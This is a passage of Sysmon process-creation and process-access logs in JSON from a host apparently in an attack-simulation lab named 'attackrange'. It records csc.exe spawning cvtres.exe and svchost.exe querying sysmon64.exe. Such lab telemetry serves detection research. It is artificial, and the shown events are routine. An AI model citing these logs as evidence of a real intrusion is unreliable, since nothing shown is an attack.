ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nParentProcessId: 2820\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\rnhc3lzn.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.886","ProcessGuid":"{A837DB8D-032E-5F25-0000-00103A770A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESDDF4.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC21263F864C234A3C97BFB996E7FF15B1.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-0010AB730A00}","ParentProcessId":"2820","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\rnhc3lzn.cmdline\"","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-0010AB730A00}\r\nSourceProcessId: 2820\r\nSourceThreadId: 4608\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00103A770A00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-0010AB730A00}","SourceProcessId":"2820","SourceThreadId":"4608","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00103A770A00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00103A770A00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00103A770A00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 